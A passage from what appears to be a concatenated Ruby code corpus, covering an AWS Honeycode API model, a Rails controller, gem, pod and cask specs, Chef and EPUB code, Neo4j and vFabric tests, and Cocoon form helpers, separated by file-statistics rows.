API = Seahorse::Model::Api.new.tap do |api|
api.version = "2020-03-01"
api.metadata = {
"apiVersion" => "2020-03-01",
"endpointPrefix" => "honeycode",
"jsonVersion" => "1.1",
"protocol" => "rest-json",
"serviceAbbreviation" => "Honeycode",
"serviceFullName" => "Amazon Honeycode",
"serviceId" => "Honeycode",
"signatureVersion" => "v4",
"signingName" => "honeycode",
"uid" => "honeycode-2020-03-01",
}
api.add_operation(:batch_create_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchCreateTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchcreate"
o.input = Shapes::ShapeRef.new(shape: BatchCreateTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: BatchCreateTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceQuotaExceededException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
end)
api.add_operation(:batch_delete_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchDeleteTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchdelete"
o.input = Shapes::ShapeRef.new(shape: BatchDeleteTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: BatchDeleteTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
end)
api.add_operation(:batch_update_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchUpdateTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchupdate"
o.input = Shapes::ShapeRef.new(shape: BatchUpdateTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: BatchUpdateTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
end)
api.add_operation(:batch_upsert_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchUpsertTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchupsert"
o.input = Shapes::ShapeRef.new(shape: BatchUpsertTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: BatchUpsertTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceQuotaExceededException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
end)
api.add_operation(:describe_table_data_import_job, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeTableDataImportJob"
o.http_method = "GET"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/import/{jobId}"
o.input = Shapes::ShapeRef.new(shape: DescribeTableDataImportJobRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeTableDataImportJobResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
end)
api.add_operation(:get_screen_data, Seahorse::Model::Operation.new.tap do |o|
o.name = "GetScreenData"
o.http_method = "POST"
o.http_request_uri = "/screendata"
o.input = Shapes::ShapeRef.new(shape: GetScreenDataRequest)
o.output = Shapes::ShapeRef.new(shape: GetScreenDataResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
end)
api.add_operation(:invoke_screen_automation, Seahorse::Model::Operation.new.tap do |o|
o.name = "InvokeScreenAutomation"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/apps/{appId}/screens/{screenId}/automations/{automationId}"
o.input = Shapes::ShapeRef.new(shape: InvokeScreenAutomationRequest)
o.output = Shapes::ShapeRef.new(shape: InvokeScreenAutomationResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: AutomationExecutionException)
o.errors << Shapes::ShapeRef.new(shape: AutomationExecutionTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
end)
api.add_operation(:list_table_columns, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTableColumns"
o.http_method = "GET"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/columns"
o.input = Shapes::ShapeRef.new(shape: ListTableColumnsRequest)
o.output = Shapes::ShapeRef.new(shape: ListTableColumnsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o[:pager] = Aws::Pager.new(
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/list"
o.input = Shapes::ShapeRef.new(shape: ListTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: ListTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_tables, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTables"
o.http_method = "GET"
o.http_request_uri = "/workbooks/{workbookId}/tables"
o.input = Shapes::ShapeRef.new(shape: ListTablesRequest)
o.output = Shapes::ShapeRef.new(shape: ListTablesResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:query_table_rows, Seahorse::Model::Operation.new.tap do |o|
o.name = "QueryTableRows"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/query"
o.input = Shapes::ShapeRef.new(shape: QueryTableRowsRequest)
o.output = Shapes::ShapeRef.new(shape: QueryTableRowsResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:start_table_data_import_job, Seahorse::Model::Operation.new.tap do |o|
o.name = "StartTableDataImportJob"
o.http_method = "POST"
o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/import"
o.input = Shapes::ShapeRef.new(shape: StartTableDataImportJobRequest)
o.output = Shapes::ShapeRef.new(shape: StartTableDataImportJobResult)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
o.errors << Shapes::ShapeRef.new(shape: ValidationException)
end)
end
end
end
| 70.489426 | 172 | 0.763094 |
e98803e854a0b0bcd9a7635f667caa67a0634f21 | 694 | class Api::V1::UsersController < ApplicationController
def index
@users = User.all
render json: @users
end
def show
@user = User.find(params[:id])
render json: @user
end
def create
@user = User.create(user_params)
end
def destroy
User.find(params[:id]).destroy
end
def update
@user = User.find(params[:id])
@user.update(user_params)
if @user.save
render json: @user
else
render json: {errors: @user.errors.full_messages}, status: 422
end
end
private
def user_params
params.permit(:name, :cash, :cryptokey)
end
end
| 18.263158 | 74 | 0.560519 |
7998b22619bab9a6b6f6508d95a6025a1326b153 | 3,280 | Gem::Specification.new do |s|
s.specification_version = 2 if s.respond_to? :specification_version=
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
## Leave these as is they will be modified for you by the rake gemspec task.
## If your rubyforge_project name is different, then edit it and comment out
## the sub! line in the Rakefile
s.name = 'fog'
s.version = '1.18.0'
s.date = '2013-10-31'
s.rubyforge_project = 'fog'
## Make sure your summary is short. The description may be as long
## as you like.
s.summary = "brings clouds to you"
s.description = "The Ruby cloud services library. Supports all major cloud providers including AWS, Rackspace, Linode, Blue Box, StormOnDemand, and many others. Full support for most AWS services including EC2, S3, CloudWatch, SimpleDB, ELB, and RDS."
## List the primary authors. If there are a bunch of authors, it's probably
## better to set the email to an email list or something. If you don't have
## a custom homepage, consider using your GitHub URL or the like.
s.authors = ["geemus (Wesley Beary)"]
s.email = '[email protected]'
s.homepage = 'http://github.com/fog/fog'
s.license = 'MIT'
## This sections is only necessary if you have C extensions.
# s.require_paths << 'ext'
# s.extensions = %w[ext/extconf.rb]
## This gets added to the $LOAD_PATH so that 'lib/NAME.rb' can be required as
## require 'NAME.rb' or'/lib/NAME/file.rb' can be as require 'NAME/file.rb'
s.require_paths = %w[lib]
## If your gem includes any executables, list them here.
s.executables = ["fog"]
## Specify any RDoc options here. You'll want to add your README and
## LICENSE files to the extra_rdoc_files list.
s.rdoc_options = ["--charset=UTF-8"]
s.extra_rdoc_files = %w[README.md]
## List your runtime dependencies here. Runtime dependencies are those
## that are needed for an end user to actually USE your code.
s.add_dependency('builder')
s.add_dependency('excon', '~>0.28.0')
s.add_dependency('formatador', '~>0.2.0')
s.add_dependency('multi_json', '~>1.0')
s.add_dependency('mime-types')
s.add_dependency('net-scp', '~>1.1')
s.add_dependency('net-ssh', '>=2.1.3')
s.add_dependency('nokogiri', '~>1.5')
s.add_dependency('ruby-hmac')
## List your development dependencies here. Development dependencies are
## those that are only needed during development
s.add_development_dependency('jekyll') unless RUBY_PLATFORM == 'java'
s.add_development_dependency('rake')
s.add_development_dependency('rbvmomi')
s.add_development_dependency('yard')
s.add_development_dependency('thor')
s.add_development_dependency('rspec', '~>1.3.1')
s.add_development_dependency('rbovirt', '>=0.0.11')
s.add_development_dependency('shindo', '~>0.3.4')
s.add_development_dependency('fission')
s.add_development_dependency('pry')
s.add_development_dependency('google-api-client', '~>0.6.2')
s.add_development_dependency('unf')
if ENV["FOG_USE_LIBVIRT"] && RUBY_PLATFORM != 'java'
s.add_development_dependency('ruby-libvirt','~>0.4.0')
end
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {spec,tests}/*`.split("\n")
end
| 43.733333 | 253 | 0.700305 |
4a32c1816cb0ada40cdd485d0907a4f24cb7975d | 1,976 | # vFabric Administration Server Ruby API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module WebServer
class TestNodeInstances < VasTestCase
def test_list
instances = NodeInstances.new(
'https://localhost:8443/web-server/v1/nodes/1/instances/',
StubClient.new)
assert_count(2, instances)
assert_equal('https://localhost:8443/vfabric/v1/security/3/', instances.security.location)
end
def test_instance
location = 'https://localhost:8443/web-server/v1/nodes/1/instances/2/'
client = StubClient.new
instance = NodeInstance.new(location, client)
assert_equal('example', instance.name)
assert_equal('https://localhost:8443/web-server/v1/groups/1/instances/2/', instance.group_instance.location)
assert_equal('https://localhost:8443/web-server/v1/nodes/0/instances/3/logs/', instance.logs.location)
assert_equal('https://localhost:8443/web-server/v1/nodes/0/', instance.node.location)
assert_equal('https://localhost:8443/vfabric/v1/security/4/', instance.security.location)
client.expect(:post, nil, ['https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', { :status => 'STARTED'}])
client.expect(:post, nil, ['https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', { :status => 'STOPPED'}])
instance.start
instance.stop
client.verify
end
end
end
| 38.745098 | 125 | 0.710526 |
bbc2c82805b07864344e16c2c875a7d2bd260e55 | 1,281 | #
# Cookbook: kubernetes-cluster
# License: Apache 2.0
#
# Copyright 2015-2016, Bloomberg Finance L.P.
#
service 'kube-apiserver' do
action :enable
end
node.default['kubernetes']['master']['fqdn'] = node['fqdn']
template '/etc/kubernetes/etcd.client.conf' do
mode '0644'
source 'kube-apiserver-etcd.erb'
variables(
etcd_cert_dir: node['kubernetes']['secure']['directory'],
etcd_members: etcdservers,
etcd_client_port: node['kubernetes']['etcd']['clientport'],
etcd_peer_port: 2379
)
only_if { node['kubernetes']['secure']['enabled'] == 'true' }
end
template '/etc/kubernetes/apiserver' do
mode '0640'
source 'kube-apiserver.erb'
variables(
etcd_client_port: node['kubernetes']['etcd']['clientport'],
kubernetes_api_port: node['kubernetes']['insecure']['apiport'],
kubernetes_secure_api_port: node['kubernetes']['secure']['apiport'],
kubernetes_master: node['kubernetes']['master']['fqdn'],
etcd_members: node['kubernetes_cluster']['etcd']['members'],
etcd_peer_port: 2379,
kubernetes_network: node['kubernetes']['master']['service-network'],
kubelet_port: node['kubelet']['port'],
etcd_cert_dir: node['kubernetes']['secure']['directory']
)
notifies :restart, 'service[kube-apiserver]', :immediately
end
| 30.5 | 72 | 0.693989 |
1a5d0fd6489b50d839626a9a009ac89d0f856aa3 | 3,871 | # frozen_string_literal: true
module EPub
module Unmarshaller
class Content
private_class_method :new
# Class Methods
def self.from_rootfile_full_path(rootfile, full_path)
return null_object unless rootfile&.instance_of?(Rootfile) && full_path&.instance_of?(String) && full_path.present?
new(rootfile, full_path)
end
def self.null_object
ContentNullObject.send(:new)
end
# Instance Methods
def idref_with_index_from_href(href)
href = href.split('#').first
idref = href_idref[href]
idref ||= base_href_idref[href]
idref ||= up_one_href_idref[href]
index = idref_index[idref]
return [idref, index] if idref.present? && index.present? && index.positive?
['', 0]
end
def chapter_from_title(title)
chapter_list.chapters.each do |chapter|
return chapter if chapter.title.casecmp?(title)
end
Chapter.null_object
end
def nav
return @nav unless @nav.nil?
begin
nav_href = @content_doc.xpath(".//manifest/item[@properties='nav']").first.attributes["href"].value || ''
@nav = Nav.from_content_nav_full_path(self, File.join(full_dir, nav_href))
rescue StandardError => _e
@nav = Nav.null_object
end
@nav
end
def chapter_list
return @chapter_list unless @chapter_list.nil?
begin
chapter_list_href = @content_doc.xpath(".//manifest/item[@id='chapterlist']").first.attributes["href"].value || ''
@chapter_list = ChapterList.from_content_chapter_list_full_path(self, File.join(full_dir, chapter_list_href))
rescue StandardError => _e
@chapter_list = ChapterList.null_object
end
@chapter_list
end
private
def initialize(rootfile, full_path)
@rootfile = rootfile
@full_path = full_path
begin
@content_doc = Nokogiri::XML::Document.parse(File.open(@full_path)).remove_namespaces!
rescue StandardError => _e
@content_doc = Nokogiri::XML::Document.parse(nil)
end
end
def full_dir
@full_dir ||= File.dirname(@full_path)
end
def href_idref
return @href_idref unless @href_idref.nil?
@href_idref = {}
@content_doc.xpath(".//manifest/item").each do |item|
href = item.attribute('href').value
idref = item.attribute('id').value
@href_idref[href] = idref if href.present? && idref.present?
end
@href_idref
end
def base_href_idref
return @base_href_idref unless @base_href_idref.nil?
@base_href_idref = {}
href_idref.each do |href, idref|
base_href = File.basename(href)
@base_href_idref[base_href] = idref
end
@base_href_idref
end
def up_one_href_idref
return @up_one_href_idref unless @up_one_href_idref.nil?
@up_one_href_idref = {}
href_idref.each do |href, idref|
up_one_href = "../#{href}"
@up_one_href_idref[up_one_href] = idref
end
@up_one_href_idref
end
def idref_index
return @idref_index unless @idref_index.nil?
@idref_index = {}
index = 0
@content_doc.xpath(".//spine/itemref").each do |itemref|
idref = itemref.attribute('idref').value
index += 1
@idref_index[idref] = index if idref.present?
end
@idref_index
end
end
class ContentNullObject < Content
private_class_method :new
private
def initialize
super(Rootfile.null_object, '')
end
end
end
end
| 29.549618 | 124 | 0.592353 |
8759d339b20c71380f084af34fffe7c1dd37430a | 1,494 | cask 'unison' do
if MacOS.version <= :mountain_lion
version '2.40.69'
sha256 '2bcc460511f2b43fa1613cc5f9ba4dd59bb12d40b5b9fb2e9f21adaf854bcf3b'
# unison-binaries.inria.fr was verified as official when first introduced to the cask
url "https://unison-binaries.inria.fr/files/Unison-#{version}_x64.dmg"
elsif MacOS.version <= :yosemite
version '2.48.3'
sha256 'd578196d8b38f35c1e0410a1c86ff4e115a91f7eb211201db7a940a3a3e0f099'
# github.com/bcpierce00/unison/releases/download was verified as official when first introduced to the cask
url "https://github.com/bcpierce00/unison/releases/download/#{version}/Unison-OS-X-#{version}.zip"
else
version '2.51.2'
sha256 '0738a6978fa29bb2af409322069cc20df293b770877942ac4b8774f06e774aa5'
# github.com/bcpierce00/unison/releases/download was verified as official when first introduced to the cask
url "https://github.com/bcpierce00/unison/releases/download/v#{version}/Unison-#{version}.OS.X.zip"
end
appcast 'https://github.com/bcpierce00/unison/releases.atom',
checkpoint: 'd3bc408807276d276906f10771f8332609da1f99de651937f256666db8268737'
name 'Unison'
homepage 'https://www.cis.upenn.edu/~bcpierce/unison/'
conflicts_with formula: 'unison'
app 'Unison.app'
binary "#{appdir}/Unison.app/Contents/MacOS/cltool", target: 'unison'
postflight do
system_command '/usr/bin/defaults', args: ['write', 'edu.upenn.cis.Unison', 'CheckCltool', '-bool', 'false']
end
end
| 41.5 | 112 | 0.754351 |
bbdd9762d829d7478e93d98767f81074846a57a7 | 1,549 | Pod::Spec.new do |s|
s.name = "RainbowNavigationOC"
s.version = "1.0.0"
s.summary = "它允许你在各种情况下动画改变UINavigationBar的backgroundColor。"
s.homepage = "https://github.com/timRabbit/RainbowNavigationOC"
s.social_media_url = "https://github.com/timRabbit/RainbowNavigationOC"
s.platform = :ios,'8.0'
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { " tim" => "[email protected]" }
s.source = { :git => "https://github.com/timRabbit/RainbowNavigationOC.git",:tag => s.version.to_s }
s.ios.deployment_target = "8.0"
s.requires_arc = true
s.framework = "CoreFoundation","Foundation","CoreGraphics","Security","UIKit"
s.library = "z.1.1.3","stdc++","sqlite3"
s.source_files = 'RainbowNavigation'
#s.resources = 'SIDADView/*.{bundle}'
# s.dependency 'XAspect'
# s.dependency 'TimCore/TimCore','~>1.2.12'
# s.dependency 'JPush-iOS-SDK','~>3.0.2'
# s.ios.frameworks = 'UserNotifications'
# s.subspec 'YMCitySelect' do |sp|
# sp.source_files = 'YMCitySelect/*.{h,m,mm}'
# sp.resources = "Extend/**/*.{png}"
# sp.requires_arc = true
# sp.xcconfig = { 'HEADER_SEARCH_PATHS' => '$(SDKROOT)/usr/include/libz, $(SDKROOT)/usr/include/libxml2', 'CLANG_CXX_LANGUAGE_STANDARD' => 'gnu++0x', 'CLANG_CXX_LIBRARY' => 'libstdc++', 'CLANG_WARN_DIRECT_OBJC_ISA_USAGE' => 'YES'}
# sp.dependency 'FontIcon'
# sp.prefix_header_contents = '#import "EasyIOS.h"'
# end
end
| 45.558824 | 232 | 0.610717 |
e9802998170065d5956e20cf98cbc4c1e49ef0a0 | 1,362 | # Copyright (c) 2009-2011 Cyril Rohr, INRIA Rennes - Bretagne Atlantique
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
describe NetworkEquipmentsController do
render_views
describe 'GET /network_equipments' do
it 'should get 200 in default' do
get :index, params: { format: :json }
expect(response.status).to eq(200)
end
it 'should get collection' do
get :index, params: { format: :json }
expect(response.status).to eq(200)
expect(json['total']).to eq(9)
expect(json['items'].length).to eq(9)
end
it 'should get collection for a site' do
get :index, params: { site_id: 'lille', format: :json }
expect(response.status).to eq(200)
expect(json['total']).to eq(3)
expect(json['items'].length).to eq(3)
end
end # describe "GET /network_equipments"
end
| 33.219512 | 74 | 0.697504 |
7a42d297317238246bc8e996ed40fa15be479e27 | 26 | require_relative 'client'
| 13 | 25 | 0.846154 |
e9664661777194335e4bea8102bf3dea7ec5848b | 1,097 |
#
# testing ruote
#
# Thu Dec 24 18:05:39 JST 2009
#
require File.join(File.dirname(__FILE__), 'base')
class FtAddServiceTest < Test::Unit::TestCase
include FunctionalBase
class MyService
attr_reader :context, :options
def initialize(context, options={})
@context = context
@options = options
end
end
def test_as_path_class
@engine.add_service('toto', 'ruote', 'FtAddServiceTest::MyService')
assert_equal MyService, @engine.context.toto.class
end
def test_as_instance
@engine.add_service('toto', MyService.new(nil))
assert_equal MyService, @engine.context.toto.class
end
def test_as_path_class_options
@engine.add_service(
'toto', 'ruote', 'FtAddServiceTest::MyService', 'colour' => 'blue')
assert_equal MyService, @engine.context.toto.class
assert_equal 'blue', @engine.context.toto.options['colour']
end
def test_add_service_returns_service
toto = @engine.add_service(
'toto', 'ruote', 'FtAddServiceTest::MyService', 'colour' => 'blue')
assert_equal MyService, toto.class
end
end
| 19.245614 | 73 | 0.698268 |
03076003f239d4216b4b1cacc9851fc38bd3bb5d | 4,375 | require 'spec_helper'
describe Neo4j::Shared::Property do
let(:clazz) { Class.new { include Neo4j::Shared::Property } }
describe ':property class method' do
it 'raises an error when passing illegal properties' do
Neo4j::Shared::DeclaredProperty::ILLEGAL_PROPS.push 'foo'
expect { clazz.property :foo }.to raise_error(Neo4j::Shared::DeclaredProperty::IllegalPropertyError)
end
end
describe '.undef_property' do
before(:each) do
clazz.property :bar
expect(clazz).to receive(:undef_constraint_or_index)
clazz.undef_property :bar
end
it 'removes methods' do
clazz.method_defined?(:bar).should be false
clazz.method_defined?(:bar=).should be false
clazz.method_defined?(:bar?).should be false
end
end
describe 'types for timestamps' do
context 'when type is undefined inline' do
before do
clazz.property :created_at
clazz.property :updated_at
end
it 'defaults to DateTime' do
expect(clazz.attributes[:created_at][:type]).to eq(DateTime)
expect(clazz.attributes[:updated_at][:type]).to eq(DateTime)
end
context '...and specified in config' do
before do
Neo4j::Config[:timestamp_type] = Integer
clazz.property :created_at
clazz.property :updated_at
end
it 'uses type set in config' do
expect(clazz.attributes[:created_at][:type]).to eq(Integer)
expect(clazz.attributes[:updated_at][:type]).to eq(Integer)
end
end
end
context 'when type is defined' do
before do
clazz.property :created_at, type: Date
clazz.property :updated_at, type: Date
end
it 'does not change type' do
expect(clazz.attributes[:created_at][:type]).to eq(Date)
expect(clazz.attributes[:updated_at][:type]).to eq(Date)
end
end
context 'for Time type' do
before do
clazz.property :created_at, type: Time
clazz.property :updated_at, type: Time
end
# ActiveAttr does not know what to do with Time, so it is stored as Int.
it 'tells ActiveAttr it is an Integer' do
expect(clazz.attributes[:created_at][:type]).to eq(Integer)
expect(clazz.attributes[:updated_at][:type]).to eq(Integer)
end
end
end
describe '#typecasting' do
context 'with custom typecaster' do
let(:typecaster) do
Class.new do
def call(value)
value.to_s.upcase
end
end
end
let(:instance) { clazz.new }
before do
allow(clazz).to receive(:extract_association_attributes!)
clazz.property :some_property, typecaster: typecaster.new
end
it 'uses custom typecaster' do
instance.some_property = 'test'
expect(instance.some_property).to eq('TEST')
end
end
end
describe '#custom type converter' do
let(:converter) do
Class.new do
class << self
def convert_type
Range
end
def to_db(value)
value.to_s
end
def to_ruby(value)
ends = value.to_s.split('..').map { |d| Integer(d) }
ends[0]..ends[1]
end
end
end
end
let(:clazz) { Class.new { include Neo4j::ActiveNode } }
let(:instance) { clazz.new }
let(:range) { 1..3 }
before do
clazz.property :range, serializer: converter
end
it 'sets active_attr typecaster to ObjectTypecaster' do
expect(clazz.attributes[:range][:typecaster]).to be_a(ActiveAttr::Typecasting::ObjectTypecaster)
end
it 'adds new converter' do
expect(Neo4j::Shared::TypeConverters.converters[Range]).to eq(converter)
end
it 'returns object of a proper type' do
instance.range = range
expect(instance.range).to be_a(Range)
end
it 'uses type converter to serialize node' do
instance.range = range
expect(instance.class.declared_property_manager.convert_properties_to(instance, :db, instance.props)[:range]).to eq(range.to_s)
end
it 'uses type converter to deserialize node' do
instance.range = range.to_s
expect(instance.class.declared_property_manager.convert_properties_to(instance, :ruby, instance.props)[:range]).to eq(range)
end
end
end
| 28.225806 | 133 | 0.633829 |
91f7153a979f08587cb84dd5dbbe1a84c55c540d | 7,297 | module Cocoon
module ViewHelpers
# this will show a link to remove the current association. This should be placed inside the partial.
# either you give
# - *name* : the text of the link
# - *f* : the form this link should be placed in
# - *html_options*: html options to be passed to link_to (see <tt>link_to</tt>)
#
# or you use the form without *name* with a *&block*
# - *f* : the form this link should be placed in
# - *html_options*: html options to be passed to link_to (see <tt>link_to</tt>)
# - *&block*: the output of the block will be show in the link, see <tt>link_to</tt>
def link_to_remove_association(*args, &block)
if block_given?
link_to_remove_association(capture(&block), *args)
elsif args.first.respond_to?(:object)
form = args.first
association = form.object.class.to_s.tableize
name = I18n.translate("cocoon.#{association}.remove", default: I18n.translate('cocoon.defaults.remove'))
link_to_remove_association(name, *args)
else
name, f, html_options = *args
html_options ||= {}
is_dynamic = f.object.new_record?
classes = []
classes << "remove_fields"
classes << (is_dynamic ? 'dynamic' : 'existing')
classes << 'destroyed' if f.object.marked_for_destruction?
html_options[:class] = [html_options[:class], classes.join(' ')].compact.join(' ')
wrapper_class = html_options.delete(:wrapper_class)
html_options[:'data-wrapper-class'] = wrapper_class if wrapper_class.present?
hidden_field_tag("#{f.object_name}[_destroy]", f.object._destroy) + link_to(name, '#', html_options)
end
end
# :nodoc:
def render_association(association, f, new_object, form_name, render_options={}, custom_partial=nil)
partial = get_partial_path(custom_partial, association)
locals = render_options.delete(:locals) || {}
ancestors = f.class.ancestors.map{|c| c.to_s}
method_name = ancestors.include?('SimpleForm::FormBuilder') ? :simple_fields_for : (ancestors.include?('Formtastic::FormBuilder') ? :semantic_fields_for : :fields_for)
f.send(method_name, association, new_object, {:child_index => "new_#{association}"}.merge(render_options)) do |builder|
partial_options = {form_name.to_sym => builder, :dynamic => true}.merge(locals)
render(partial, partial_options)
end
end
# shows a link that will allow to dynamically add a new associated object.
#
# - *name* : the text to show in the link
# - *f* : the form this should come in (the formtastic form)
# - *association* : the associated objects, e.g. :tasks, this should be the name of the <tt>has_many</tt> relation.
# - *html_options*: html options to be passed to <tt>link_to</tt> (see <tt>link_to</tt>)
